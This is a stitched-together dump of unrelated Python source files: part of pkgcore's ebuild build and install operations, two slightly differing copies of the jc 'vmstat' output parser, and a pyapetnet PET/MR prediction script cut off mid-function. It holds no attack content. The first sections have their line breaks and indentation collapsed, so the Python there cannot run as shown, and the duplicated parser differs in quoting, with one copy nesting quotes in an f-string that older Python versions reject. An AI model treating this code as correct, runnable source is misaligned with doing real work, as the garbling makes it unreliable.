sys.stdout.flush() sys.stderr.flush() try: if not ebd.run_phase(phase, env, tmpdir=tmpdir, sandbox=sandbox, logging=logging, additional_commands=extra_handlers): if not failure_allowed: raise format.GenericBuildError( phase + ": Failed building (False/0 return from handler)") logger.warning(f"executing phase {phase}: execution failed, ignoring") except Exception as e: if isinstance(e, ebd_ipc.IpcError): # notify bash side of IPC error ebd.write(e.ret) if isinstance(e, ebd_ipc.IpcInternalError): # show main exception cause for internal IPC errors ebd.shutdown_processor(force=True) raise e.__cause__ try: ebd.shutdown_processor() except ProcessorError as pe: # catch die errors during shutdown e = pe release_ebuild_processor(ebd) if isinstance(e, ProcessorError): # force verbose die output e._verbosity = 1 raise e elif isinstance(e, IGNORED_EXCEPTIONS + (format.GenericBuildError,)): raise raise format.GenericBuildError( f"Executing phase {phase}: Caught exception: {e}") from e release_ebuild_processor(ebd) return True class install_op(ebd, format.install): """Phase operations and steps for install execution.""" def __init__(self, domain, pkg, observer): format.install.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False) preinst = pretty_docs( observer.decorate_build_method("preinst")( post_curry(ebd._generic_phase, "preinst", False, False)), "run the postinst phase") postinst = pretty_docs( observer.decorate_build_method("postinst")( post_curry(ebd._generic_phase, "postinst", False, False)), "run the postinst phase") def add_triggers(self, domain_op, engine): self.new_pkg.add_format_triggers(domain_op, self, engine) class uninstall_op(ebd, format.uninstall): """Phase operations and steps for uninstall execution.""" def __init__(self, domain, pkg, observer): format.uninstall.__init__(self, domain, pkg, observer) ebd.__init__( self, pkg, observer=observer, initial_env=self.domain.settings, env_data_source=pkg.environment, clean=False, tmp_offset="unmerge") prerm = pretty_docs( observer.decorate_build_method("prerm")( post_curry(ebd._generic_phase, "prerm", False, False)), "run the prerm phase") postrm = pretty_docs( observer.decorate_build_method("postrm")( post_curry( ebd._generic_phase, "postrm", False, False, failure_allowed=True)), "run the postrm phase") def add_triggers(self, domain_op, engine): self.old_pkg.add_format_triggers(domain_op, self, engine) def finish(self): self.cleanup() return format.uninstall.finish(self) class replace_op(format.replace): """Phase operations and steps for replace execution.""" install_kls = staticmethod(install_op) uninstall_kls = staticmethod(uninstall_op) def __init__(self, domain, old_pkg, new_pkg, observer): super().__init__(domain, old_pkg, new_pkg, observer) self.install_op = install_op(domain, new_pkg, observer) self.install_op.set_is_replacing(old_pkg) self.uninstall_op = uninstall_op(domain, old_pkg, observer) self.uninstall_op.set_is_being_replaced_by(new_pkg) def start(self): self.install_op.start() self.uninstall_op.start() return True prerm = klass.alias_method("uninstall_op.prerm") postrm = klass.alias_method("uninstall_op.postrm") preinst = klass.alias_method("install_op.preinst") postinst = klass.alias_method("install_op.postinst") def finalize(self): ret = self.uninstall_op.finish() ret2 = self.install_op.finish() return (ret and ret2) def add_triggers(self, domain_op, engine): self.uninstall_op.add_triggers(domain_op, engine) 
self.install_op.add_triggers(domain_op, engine) class buildable(ebd, setup_mixin, format.build): """Generic build operation.""" # XXX this is unclean- should be handing in strictly what is build # env, rather then dumping domain settings as env. def __init__(self, domain, pkg, verified_files, eclass_cache, observer=None, force_test=False, **kwargs): """ :param pkg: :obj:`pkgcore.ebuild.ebuild_src.package` instance we'll be building :param eclass_cache: the :class:`pkgcore.ebuild.eclass_cache` we'll be using :param verified_files: mapping of fetchables mapped to their disk location """ self._built_class = ebuild_built.fresh_built_package format.build.__init__(self, domain, pkg, verified_files, observer) domain_settings = self.domain.settings ebd.__init__(self, pkg, initial_env=domain_settings, **kwargs) self.env["FILESDIR"] = pjoin(os.path.dirname(pkg.ebuild.path), "files") self.eclass_cache = eclass_cache self.run_test = force_test or self.feat_or_bool("test", domain_settings) self.allow_failed_test = self.feat_or_bool("test-fail-continue", domain_settings) if "test" in self.restrict: self.run_test = False elif not force_test and "test" not in pkg.use: if self.run_test: logger.warning(f"disabling test for {pkg} due to test use flag being disabled") self.run_test = False # XXX minor hack path = self.env["PATH"].split(os.pathsep) for s, default in (("DISTCC", ".distcc"), ("CCACHE", "ccache")): b = (self.feat_or_bool(s, domain_settings) and s not in self.restrict) setattr(self, s.lower(), b) if b: # looks weird I realize, but # pjoin("/foor/bar", "/barr/foo") == "/barr/foo" # and pjoin("/foo/bar", ".asdf") == "/foo/bar/.asdf" self.env.setdefault(s + "_DIR", pjoin(self.domain.tmpdir, default)) # gentoo bug 355283 libdir = self.env.get("ABI") if libdir is not None: libdir = self.env.get(f"LIBDIR_{libdir}") if libdir is not None: libdir = self.env.get(libdir) if libdir is None: libdir = "lib" path.insert(0, f"/usr/{libdir}/{s.lower()}/bin") else: for y in ("_PATH", "_DIR"): if s + y in self.env: del self.env[s+y] self.env["PATH"] = os.pathsep.join(path) # ordering must match appearance order in SRC_URI per PMS self.env["A"] = ' '.join(iter_stable_unique(pkg.distfiles)) if self.eapi.options.has_AA: pkg = self.pkg while hasattr(pkg, '_raw_pkg'): pkg = getattr(pkg, '_raw_pkg') self.env["AA"] = ' '.join(set(iflatten_instance(pkg.distfiles))) if self.eapi.options.has_KV: self.env["KV"] = domain.KV if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "source" if self.eapi.options.has_portdir: self.env["PORTDIR"] = pkg.repo.location self.env["ECLASSDIR"] = eclass_cache.eclassdir if self.setup_is_for_src: # TODO: PORTAGE_ACTUAL_DISTDIR usage by VCS eclasses needs to be # dropped, but it's currently required for repo reuse. self.env['PORTAGE_ACTUAL_DISTDIR'] = domain.distdir self.env['DISTDIR'] = normpath(pjoin(self.builddir, 'distdir')) for k in ('PORTAGE_ACTUAL_DISTDIR', 'DISTDIR'): self.env[k] = os.path.realpath(self.env[k]).rstrip(os.sep) + os.sep def _setup_distfiles(self): # fetch distfiles if not self.verified_files: ops = self.domain.pkg_operations(self.pkg, observer=self.observer) if ops.fetch(): # this break encapsulation and should be refactored. Trace # f35f2 and 6561eac for where this was refactored. 
self.verified_files = ops.verified_files # symlink them into builddir if self.verified_files: try: if os.path.exists(self.env["DISTDIR"]): if (os.path.isdir(self.env["DISTDIR"]) and not os.path.islink(self.env["DISTDIR"])): shutil.rmtree(self.env["DISTDIR"]) else: os.unlink(self.env["DISTDIR"]) except EnvironmentError as e: raise format.FailedDirectory( self.env["DISTDIR"], f"failed removing existing file/dir/link: {e}") from e if not ensure_dirs(self.env["DISTDIR"], mode=0o770, gid=portage_gid): raise format.FailedDirectory( self.env["DISTDIR"], "failed creating distdir symlink directory") try: for src, dest in [ (k, pjoin(self.env["DISTDIR"], v.filename)) for (k, v) in self.verified_files.items()]: os.symlink(src, dest) except EnvironmentError as e: raise format.GenericBuildError( f"Failed symlinking in distfiles for src {src} -> {dest}: {e}") from e @observer.decorate_build_method("setup") def setup(self): """Execute the setup phase, mapping out to pkg_setup in the ebuild. Necessarily dirs are created as required, and build env is initialized at this point. """ if self.distcc: for p in ("", "/lock", "/state"): if not ensure_dirs(pjoin(self.env["DISTCC_DIR"], p), mode=0o2775, gid=portage_gid): raise format.FailedDirectory( pjoin(self.env["DISTCC_DIR"], p), "failed creating needed distcc directory") if self.ccache: # yuck. st = None try: st = os.stat(self.env["CCACHE_DIR"]) except OSError as e: st = None if not ensure_dirs(self.env["CCACHE_DIR"], mode=0o2775, gid=portage_gid): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed creation of ccache dir") from e # XXX this is more then mildly stupid. st = os.stat(self.env["CCACHE_DIR"]) try: if st.st_gid != portage_gid or (st.st_mode & 0o2775) != 0o2775: try: cwd = os.getcwd() except OSError: cwd = "/" with chdir(cwd): # crap. os.chmod(self.env["CCACHE_DIR"], 0o2775) os.chown(self.env["CCACHE_DIR"], -1, portage_gid) if 0 != spawn( ["chgrp", "-R", str(portage_gid), self.env["CCACHE_DIR"]]): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed changing ownership for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type d -print0 | %s --null chmod 02775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") if 0 != spawn_bash( "find '%s' -type f -print0 | %s --null chmod 0775" % (self.env["CCACHE_DIR"], xargs)): raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed correcting perms for CCACHE_DIR") except OSError as e: raise format.FailedDirectory( self.env["CCACHE_DIR"], "failed ensuring perms/group owner for CCACHE_DIR") from e return setup_mixin.setup(self) def configure(self): """Execute the configure phase. Does nothing if the pkg's EAPI is less than 2 (that spec lacks a separated configure phase). """ if "configure" in self.eapi.phases: return self._generic_phase("configure", True, True) return True def prepare(self): """Execute a source preparation phase. does nothing if the pkg's EAPI is less than 2 """ ret = True if "prepare" in self.eapi.phases: ret = self._generic_phase("prepare", True, True) if (self.eapi.options.user_patches and not os.path.exists(pjoin(self.env['T'], '.user_patches_applied'))): self.observer.error( 'eapply_user (or default) must be called in src_prepare()') raise format.GenericBuildError('missing eapply_user call') return ret def nofetch(self): """Execute the nofetch phase. We need the same prerequisites as setup, so reuse that. 
""" ensure_dirs(self.env["T"], mode=0o770, gid=portage_gid, minimal=True) return setup_mixin.setup(self, "nofetch") def unpack(self): """Execute the unpack phase.""" if self.setup_is_for_src: self._setup_distfiles() if self.userpriv: try: os.chown(self.env["WORKDIR"], portage_uid, -1) except OSError as e: raise format.GenericBuildError( "failed forcing %i uid for WORKDIR: %s" % (portage_uid, e)) from e return self._generic_phase("unpack", True, True) compile = pretty_docs( observer.decorate_build_method("compile")( post_curry(ebd._generic_phase, "compile", True, True)), "Run the compile phase (maps to src_compile).") @observer.decorate_build_method("install") def install(self): """Run the install phase (maps to src_install).""" # TODO: replace print() usage with observer print(f">>> Install {self.env['PF']} into {self.ED!r} category {self.env['CATEGORY']}") ret = self._generic_phase("install", False, True) print(f">>> Completed installing {self.env['PF']} into {self.ED!r}") return ret @observer.decorate_build_method("test") def test(self): """Run the test phase (if enabled), maps to src_test.""" if not self.run_test: return True return self._generic_phase( "test", True, True, failure_allowed=self.allow_failed_test) def finalize(self): """Finalize the operation. This yields a built package, but the packages metadata/contents are bound to the workdir. In other words, install the package somewhere prior to executing clean if you intend on installing it. :return: :obj:`pkgcore.ebuild.ebuild_built.package` instance """ factory = ebuild_built.fake_package_factory(self._built_class) return factory.new_package( self.pkg, self.env["D"], pjoin(self.env["T"], "environment")) class binpkg_localize(ebd, setup_mixin, format.build): stage_depends = {"finalize": "setup", "setup": "start"} setup_is_for_src = False def __init__(self, domain, pkg, **kwargs): self._built_class = ebuild_built.package format.build.__init__(self, domain, pkg, {}, observer=kwargs.get("observer", None)) ebd.__init__(self, pkg, **kwargs) if self.eapi.options.has_merge_type: self.env["MERGE_TYPE"] = "binpkg" def finalize(self): return MutatedPkg(self.pkg, {"environment": self.get_env_source()}) class ebuild_operations: _checks = [] def _register_check(checks): """Decorator to register sanity checks that will be run.""" def _wrap_func(func): def wrapped(*args, **kwargs): return func(*args, **kwargs) checks.append(func) return wrapped return _wrap_func def _cmd_implementation_sanity_check(self, domain): """Run all defined sanity checks.""" failures = [] for check in self._checks: if result := check(self, self.pkg, domain=domain): failures.append(result) return failures @_register_check(_checks) def _check_required_use(self, pkg, **kwargs): """Perform REQUIRED_USE verification against a set of USE flags. Note that this assumes the REQUIRED_USE depset has been evaluated against a known set of enabled USE flags and is in collapsed form. 
""" if pkg.eapi.options.has_required_use: if failures := tuple(node for node in pkg.required_use if not node.match(pkg.use)): return errors.RequiredUseError(pkg, failures) @_register_check(_checks) def _check_pkg_pretend(self, pkg, *, domain, **kwargs): """Run pkg_pretend phase.""" # pkg_pretend is not defined or required if 'pretend' not in pkg.mandatory_phases: return commands = None if not pkg.built: commands = { 'request_inherit': partial(inherit_handler, self._eclass_cache), 'has_version': ebd_ipc.Has_Version(self), 'best_version': ebd_ipc.Best_Version(self), } # Use base build tempdir for $T instead of full pkg specific path to # avoid having to create/remove directories -- pkg_pretend isn't # allowed to write to the filesystem anyway. self.env = expected_ebuild_env(pkg) self.env["T"] = domain.pm_tmpdir ebd.set_path_vars(self.env, pkg, domain) # avoid clipping eend() messages self.env["PKGCORE_RC_PREFIX"] = '2' with TemporaryFile() as f: # suppress bash output by default fd_pipes = {1: f.fileno(), 2: f.fileno()} try: run_generic_phase( pkg, "pretend", self.env, tmpdir=None, fd_pipes=fd_pipes, userpriv=True, sandbox=True, extra_handlers=commands) except ProcessorError as e: f.seek(0) output = f.read().decode().strip('\n') return errors.PkgPretendError(pkg, output, e) class src_operations(ebuild_operations, format.build_operations): def __init__(self, domain, pkg, eclass_cache, observer=None): format.build_operations.__init__(self, domain, pkg, observer=observer) self._eclass_cache = eclass_cache def _cmd_implementation_build(self, observer, verified_files, clean=False, force_test=False): return buildable( self.domain, self.pkg, verified_files, self._eclass_cache, observer=observer, clean=clean, force_test=force_test) class misc_operations(ebd): def __init__(self, domain, *args, **kwds): self.domain = domain super().__init__(*args, **kwds) def configure(self, observer=None): return self._generic_phase('config', False, True) def info(self, observer=None): return self._generic_phase('info', True, True) class built_operations(ebuild_operations, format.operations): def __init__(self, domain, pkg, observer=None, initial_env=None): format.operations.__init__(self, domain, pkg, observer=observer) self._initial_env = initial_env self._localized_ebd = None def _cmd_implementation_localize(self, observer, force=False): if not force and getattr(self.pkg, '_is_from_source', False): return self.pkg self._localized_ebd = op = binpkg_localize( self.domain, self.pkg, clean=False, initial_env=self._initial_env, env_data_source=self.pkg.environment, observer=observer) return op.finalize() def _cmd_implementation_cleanup(self, observer, force=False): if not self._localized_ebd: return True return self._localized_ebd.cleanup(force=force) def _cmd_check_support_configure(self): pkg = self.pkg if 'config' not in pkg.mandatory_phases: return False return True def _cmd_implementation_configure(self, observer): misc = misc_operations( self.domain, self.pkg, env_data_source=self.pkg.environment, clean=True) try: misc.start() misc.configure() finally: misc.cleanup() return True
"""jc - JSON CLI output utility `vmstat` command output parser Options supported: `-a`, `-w`, `-d`, `-t` The `epoch` calculated timestamp field is naive (i.e. based on the local time of the system the parser is run on) The `epoch_utc` calculated timestamp field is timezone-aware and is only available if the timezone field is UTC. Usage (cli): $ vmstat | jc --vmstat or $ jc vmstat Usage (module): import jc.parsers.vmstat result = jc.parsers.vmstat.parse(vmstat_command_output) Schema: [ { "runnable_procs": integer, "uninterruptible_sleeping_procs": integer, "virtual_mem_used": integer, "free_mem": integer, "buffer_mem": integer, "cache_mem": integer, "inactive_mem": integer, "active_mem": integer, "swap_in": integer, "swap_out": integer, "blocks_in": integer, "blocks_out": integer, "interrupts": integer, "context_switches": integer, "user_time": integer, "system_time": integer, "idle_time": integer, "io_wait_time": integer, "stolen_time": integer, "disk": string, "total_reads": integer, "merged_reads": integer, "sectors_read": integer, "reading_ms": integer, "total_writes": integer, "merged_writes": integer, "sectors_written": integer, "writing_ms": integer, "current_io": integer, "io_seconds": integer, "timestamp": string, "timezone": string, "epoch": integer, # naive timestamp if -t flag is used "epoch_utc": integer # aware timestamp if -t flag is used and UTC TZ } ] Examples: $ vmstat | jc --vmstat -p [ { "runnable_procs": 2, "uninterruptible_sleeping_procs": 0, "virtual_mem_used": 0, "free_mem": 2794468, "buffer_mem": 2108, "cache_mem": 741208, "inactive_mem": null, "active_mem": null, "swap_in": 0, "swap_out": 0, "blocks_in": 1, "blocks_out": 3, "interrupts": 29, "context_switches": 57, "user_time": 0, "system_time": 0, "idle_time": 99, "io_wait_time": 0, "stolen_time": 0, "timestamp": null, "timezone": null } ] $ vmstat | jc --vmstat -p -r [ { "runnable_procs": "2", "uninterruptible_sleeping_procs": "0", "virtual_mem_used": "0", "free_mem": "2794468", "buffer_mem": "2108", "cache_mem": "741208", "inactive_mem": null, "active_mem": null, "swap_in": "0", "swap_out": "0", "blocks_in": "1", "blocks_out": "3", "interrupts": "29", "context_switches": "57", "user_time": "0", "system_time": "0", "idle_time": "99", "io_wait_time": "0", "stolen_time": "0", "timestamp": null, "timezone": null } ] """ import jc.utils class info(): """Provides parser metadata (version, author, etc.)""" version = '1.0' description = '`vmstat` command parser' author = 'Kelly Brazil' author_email = 'kellyjonbrazil@gmail.com' # details = 'enter any other details here' # compatible options: linux, darwin, cygwin, win32, aix, freebsd compatible = ['linux'] magic_commands = ['vmstat'] __version__ = info.version def _process(proc_data): """ Final processing to conform to the schema. Parameters: proc_data: (List of Dictionaries) raw structured data to process Returns: List of Dictionaries. Structured to conform to the schema. 
""" int_list = ['runnable_procs', 'uninterruptible_sleeping_procs', 'virtual_mem_used', 'free_mem', 'buffer_mem', 'cache_mem', 'inactive_mem', 'active_mem', 'swap_in', 'swap_out', 'blocks_in', 'blocks_out', 'interrupts', 'context_switches', 'user_time', 'system_time', 'idle_time', 'io_wait_time', 'stolen_time', 'total_reads', 'merged_reads', 'sectors_read', 'reading_ms', 'total_writes', 'merged_writes', 'sectors_written', 'writing_ms', 'current_io', 'io_seconds'] for entry in proc_data: for key in entry: if key in int_list: entry[key] = jc.utils.convert_to_int(entry[key]) if entry['timestamp']: ts = jc.utils.timestamp(f'{entry['timestamp']} {entry['timezone']}') entry['epoch'] = ts.naive entry['epoch_utc'] = ts.utc return proc_data def parse(data, raw=False, quiet=False): """ Main text parsing function Parameters: data: (string) text data to parse raw: (boolean) output preprocessed JSON if True quiet: (boolean) suppress warning messages if True Returns: List of Dictionaries. Raw or processed structured data. """ if not quiet: jc.utils.compatibility(__name__, info.compatible) raw_output = [] output_line = {} procs = None buff_cache = None disk = None tstamp = None tz = None if jc.utils.has_data(data): for line in filter(None, data.splitlines()): # detect output type if not procs and not disk and line.startswith('procs'): procs = True tstamp = '-timestamp-' in line continue if not procs and not disk and line.startswith('disk'): disk = True tstamp = '-timestamp-' in line continue # skip header rows if (procs or disk) and (line.startswith('procs') or line.startswith('disk')): continue if 'swpd' in line and 'free' in line and 'buff' in line and 'cache' in line: buff_cache = True tz = line.strip().split()[-1] if tstamp else None continue if 'swpd' in line and 'free' in line and 'inact' in line and 'active' in line: buff_cache = False tz = line.strip().split()[-1] if tstamp else None continue if 'total' in line and 'merged' in line and 'sectors' in line: tz = line.strip().split()[-1] if tstamp else None continue # line parsing if procs: line_list = line.strip().split(maxsplit=17) output_line = { 'runnable_procs': line_list[0], 'uninterruptible_sleeping_procs': line_list[1], 'virtual_mem_used': line_list[2], 'free_mem': line_list[3], 'buffer_mem': line_list[4] if buff_cache else None, 'cache_mem': line_list[5] if buff_cache else None, 'inactive_mem': line_list[4] if not buff_cache else None, 'active_mem': line_list[5] if not buff_cache else None, 'swap_in': line_list[6], 'swap_out': line_list[7], 'blocks_in': line_list[8], 'blocks_out': line_list[9], 'interrupts': line_list[10], 'context_switches': line_list[11], 'user_time': line_list[12], 'system_time': line_list[13], 'idle_time': line_list[14], 'io_wait_time': line_list[15], 'stolen_time': line_list[16], 'timestamp': line_list[17] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) if disk: line_list = line.strip().split(maxsplit=11) output_line = { 'disk': line_list[0], 'total_reads': line_list[1], 'merged_reads': line_list[2], 'sectors_read': line_list[3], 'reading_ms': line_list[4], 'total_writes': line_list[5], 'merged_writes': line_list[6], 'sectors_written': line_list[7], 'writing_ms': line_list[8], 'current_io': line_list[9], 'io_seconds': line_list[10], 'timestamp': line_list[11] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) return raw_output if raw else _process(raw_output)
"""jc - JSON CLI output utility `vmstat` command output parser Options supported: `-a`, `-w`, `-d`, `-t` The `epoch` calculated timestamp field is naive (i.e. based on the local time of the system the parser is run on) The `epoch_utc` calculated timestamp field is timezone-aware and is only available if the timezone field is UTC. Usage (cli): $ vmstat | jc --vmstat or $ jc vmstat Usage (module): import jc.parsers.vmstat result = jc.parsers.vmstat.parse(vmstat_command_output) Schema: [ { "runnable_procs": integer, "uninterruptible_sleeping_procs": integer, "virtual_mem_used": integer, "free_mem": integer, "buffer_mem": integer, "cache_mem": integer, "inactive_mem": integer, "active_mem": integer, "swap_in": integer, "swap_out": integer, "blocks_in": integer, "blocks_out": integer, "interrupts": integer, "context_switches": integer, "user_time": integer, "system_time": integer, "idle_time": integer, "io_wait_time": integer, "stolen_time": integer, "disk": string, "total_reads": integer, "merged_reads": integer, "sectors_read": integer, "reading_ms": integer, "total_writes": integer, "merged_writes": integer, "sectors_written": integer, "writing_ms": integer, "current_io": integer, "io_seconds": integer, "timestamp": string, "timezone": string, "epoch": integer, # naive timestamp if -t flag is used "epoch_utc": integer # aware timestamp if -t flag is used and UTC TZ } ] Examples: $ vmstat | jc --vmstat -p [ { "runnable_procs": 2, "uninterruptible_sleeping_procs": 0, "virtual_mem_used": 0, "free_mem": 2794468, "buffer_mem": 2108, "cache_mem": 741208, "inactive_mem": null, "active_mem": null, "swap_in": 0, "swap_out": 0, "blocks_in": 1, "blocks_out": 3, "interrupts": 29, "context_switches": 57, "user_time": 0, "system_time": 0, "idle_time": 99, "io_wait_time": 0, "stolen_time": 0, "timestamp": null, "timezone": null } ] $ vmstat | jc --vmstat -p -r [ { "runnable_procs": "2", "uninterruptible_sleeping_procs": "0", "virtual_mem_used": "0", "free_mem": "2794468", "buffer_mem": "2108", "cache_mem": "741208", "inactive_mem": null, "active_mem": null, "swap_in": "0", "swap_out": "0", "blocks_in": "1", "blocks_out": "3", "interrupts": "29", "context_switches": "57", "user_time": "0", "system_time": "0", "idle_time": "99", "io_wait_time": "0", "stolen_time": "0", "timestamp": null, "timezone": null } ] """ import jc.utils class info(): """Provides parser metadata (version, author, etc.)""" version = '1.0' description = '`vmstat` command parser' author = 'Kelly Brazil' author_email = 'kellyjonbrazil@gmail.com' # details = 'enter any other details here' # compatible options: linux, darwin, cygwin, win32, aix, freebsd compatible = ['linux'] magic_commands = ['vmstat'] __version__ = info.version def _process(proc_data): """ Final processing to conform to the schema. Parameters: proc_data: (List of Dictionaries) raw structured data to process Returns: List of Dictionaries. Structured to conform to the schema. 
""" int_list = ['runnable_procs', 'uninterruptible_sleeping_procs', 'virtual_mem_used', 'free_mem', 'buffer_mem', 'cache_mem', 'inactive_mem', 'active_mem', 'swap_in', 'swap_out', 'blocks_in', 'blocks_out', 'interrupts', 'context_switches', 'user_time', 'system_time', 'idle_time', 'io_wait_time', 'stolen_time', 'total_reads', 'merged_reads', 'sectors_read', 'reading_ms', 'total_writes', 'merged_writes', 'sectors_written', 'writing_ms', 'current_io', 'io_seconds'] for entry in proc_data: for key in entry: if key in int_list: entry[key] = jc.utils.convert_to_int(entry[key]) if entry['timestamp']: ts = jc.utils.timestamp(f'{entry["timestamp"]} {entry["timezone"]}') entry['epoch'] = ts.naive entry['epoch_utc'] = ts.utc return proc_data def parse(data, raw=False, quiet=False): """ Main text parsing function Parameters: data: (string) text data to parse raw: (boolean) output preprocessed JSON if True quiet: (boolean) suppress warning messages if True Returns: List of Dictionaries. Raw or processed structured data. """ if not quiet: jc.utils.compatibility(__name__, info.compatible) raw_output = [] output_line = {} procs = None buff_cache = None disk = None tstamp = None tz = None if jc.utils.has_data(data): for line in filter(None, data.splitlines()): # detect output type if not procs and not disk and line.startswith('procs'): procs = True tstamp = '-timestamp-' in line continue if not procs and not disk and line.startswith('disk'): disk = True tstamp = '-timestamp-' in line continue # skip header rows if (procs or disk) and (line.startswith('procs') or line.startswith('disk')): continue if 'swpd' in line and 'free' in line and 'buff' in line and 'cache' in line: buff_cache = True tz = line.strip().split()[-1] if tstamp else None continue if 'swpd' in line and 'free' in line and 'inact' in line and 'active' in line: buff_cache = False tz = line.strip().split()[-1] if tstamp else None continue if 'total' in line and 'merged' in line and 'sectors' in line: tz = line.strip().split()[-1] if tstamp else None continue # line parsing if procs: line_list = line.strip().split(maxsplit=17) output_line = { 'runnable_procs': line_list[0], 'uninterruptible_sleeping_procs': line_list[1], 'virtual_mem_used': line_list[2], 'free_mem': line_list[3], 'buffer_mem': line_list[4] if buff_cache else None, 'cache_mem': line_list[5] if buff_cache else None, 'inactive_mem': line_list[4] if not buff_cache else None, 'active_mem': line_list[5] if not buff_cache else None, 'swap_in': line_list[6], 'swap_out': line_list[7], 'blocks_in': line_list[8], 'blocks_out': line_list[9], 'interrupts': line_list[10], 'context_switches': line_list[11], 'user_time': line_list[12], 'system_time': line_list[13], 'idle_time': line_list[14], 'io_wait_time': line_list[15], 'stolen_time': line_list[16], 'timestamp': line_list[17] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) if disk: line_list = line.strip().split(maxsplit=11) output_line = { 'disk': line_list[0], 'total_reads': line_list[1], 'merged_reads': line_list[2], 'sectors_read': line_list[3], 'reading_ms': line_list[4], 'total_writes': line_list[5], 'merged_writes': line_list[6], 'sectors_written': line_list[7], 'writing_ms': line_list[8], 'current_io': line_list[9], 'io_seconds': line_list[10], 'timestamp': line_list[11] if tstamp else None, 'timezone': tz or None } raw_output.append(output_line) return raw_output if raw else _process(raw_output)
import os
import argparse
from glob import glob


def list_models():
    parser = argparse.ArgumentParser(description = 'list available trained models for pyapetnet')

    parser.add_argument('--model_path',
                        help = 'absolute path of directory containing trained models',
                        default = None)

    args = parser.parse_args()

    #-------------------------------------------------------------------------------------------------
    # parse input parameters

    import pyapetnet

    model_path = args.model_path

    if model_path is None:
        model_path = os.path.join(os.path.dirname(pyapetnet.__file__), 'trained_models')

    #-------------------------------------------------------------------------------------------------

    cfg_files = sorted(glob(os.path.join(model_path, '*', 'config.json')))

    print(f'\nModel path: {model_path}')
    print('\nAvailable models')
    print('----------------')

    for cfg_file in cfg_files:
        print(f'{os.path.basename(os.path.dirname(cfg_file))}')

    print(f'\nFor details about the models, read \n{os.path.join(model_path, "model_description.md")}\nor look at the config.json files in the model directories')

#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------------------

def predict_from_nifti():
    parser = argparse.ArgumentParser(description = 'pyapetnet prediction of anatomy-guided PET reconstruction')

    parser.add_argument('pet_fname', help = 'absolute path of PET input nifti file')
    parser.add_argument('mr_fname', help = 'absolute path of MR input nifti file')
    parser.add_argument('model_name', help = 'name of trained CNN')
    parser.add_argument('--model_path', help = 'absolute path of directory containing trained models',
                        default = None)
    parser.add_argument('--output_dir', help = 'name of the output directory', default = '.')
    parser.add_argument('--output_name', help = 'basename of prediction file', default = None)
    parser.add_argument('--no_coreg', help = 'do not coregister input volumes', action = 'store_true')
    parser.add_argument('--no_crop', help = 'do not crop volumes to MR bounding box', action = 'store_true')
    parser.add_argument('--show', help = 'show the results', action = 'store_true')
    parser.add_argument('--verbose', help = 'print (extra) verbose output', action = 'store_true')
    parser.add_argument('--no_preproc_save', help = 'do not save preprocessed volumes', action = 'store_true')
    parser.add_argument('--output_on_mr_grid', help = 'regrid the CNN output to the original MR grid',
                        action = 'store_true')

    args = parser.parse_args()

    #-------------------------------------------------------------------------------------------------
    # load modules

    import pyapetnet
    from pyapetnet.preprocessing import preprocess_volumes
    from pyapetnet.utils import load_nii_in_ras

    import nibabel as nib
    import json

    import tensorflow as tf
    import numpy as np
    import matplotlib.pyplot as plt

    import pymirc.viewer as pv
    from pymirc.image_operations import aff_transform

    #-------------------------------------------------------------------------------------------------
    # parse input parameters

    pet_fname = args.pet_fname
    mr_fname = args.mr_fname
    model_name = args.model_name
    output_dir = args.output_dir
    output_name = args.output_name

    if output_name is None:
        output_name = f'prediction_{model_name}.nii'

    model_path = args.model_path
    if model_path is None:
        model_path = os.path.join(os.path.dirname(pyapetnet.__file__), 'trained_models')

    coreg_inputs = not args.no_coreg
    crop_mr = not args.no_crop
    show = args.show
    verbose = args.verbose
    save_preproc = not args.no_preproc_save
    output_on_mr_grid = args.output_on_mr_grid

    #-------------------------------------------------------------------------------------------------
    # load the trained model

    co = {'ssim_3d_loss': None, 'mix_ssim_3d_mae_loss': None}

    if verbose:
        print(f'loading CNN {os.path.join(model_path, model_name)}')

    model = tf.keras.models.load_model(os.path.join(model_path, model_name), custom_objects = co)

    # load the voxel size used for training
    with open(os.path.join(model_path, model_name, 'config.json')) as f:
        cfg = json.load(f)

    training_voxsize = cfg['internal_voxsize'] * np.ones(3)

    #------------------------------------------------------------------
    # load and preprocess the input PET and MR volumes
    pet, pet_affine = load_nii_in_ras(pet_fname)
    mr, mr_affine = load_nii_in_ras(mr_fname)

    # preprocess the input volumes (coregistration, interpolation and intensity normalization)
    pet_preproc, mr_preproc, o_aff, pet_scale, mr_scale = preprocess_volumes(
        pet, mr, pet_affine, mr_affine, training_voxsize, perc = 99.99,
        coreg = coreg_inputs, crop_mr = crop_mr)

    #------------------------------------------------------------------
    # the actual CNN prediction
    x = [np.expand_dims(np.expand_dims(pet_preproc, 0), -1),
         np.expand_dims(np.expand_dims(mr_preproc, 0), -1)]
    pred = model.predict(x).squeeze()

    # undo the intensity normalization
    pred *= pet_scale
    pet_preproc *= pet_scale
    mr_preproc *= mr_scale

    #------------------------------------------------------------------
    # save the preprocessed input and output
    os.makedirs(output_dir, exist_ok = True)

    if save_preproc:
        nib.save(nib.Nifti1Image(pet_preproc, o_aff), os.path.join(output_dir, 'pet_preproc.nii'))
        if verbose:
            print(f'wrote pre-processed PET to: {os.path.join(output_dir, "pet_preproc.nii")}')

        nib.save(nib.Nifti1Image(mr_preproc, o_aff), os.path.join(output_dir, 'mr_preproc.nii'))
        if verbose:
            print(f'wrote pre-processed MR to: {os.path.join(output_dir, "mr_preproc.nii")}')

        # save the intensity normalization factors
        np.savetxt(os.path.join(output_dir, 'preproc_scaling_factors.txt'),
                   np.array([pet_scale, mr_scale]))
        if verbose:
            print(f'wrote scaling factors to: {os.path.join(output_dir, "preproc_scaling_factors.txt")}')

    if output_on_mr_grid:
        oss = np.ceil(np.linalg.norm(mr_affine[:-1, :-1], axis = 0) / training_voxsize).astype(int)
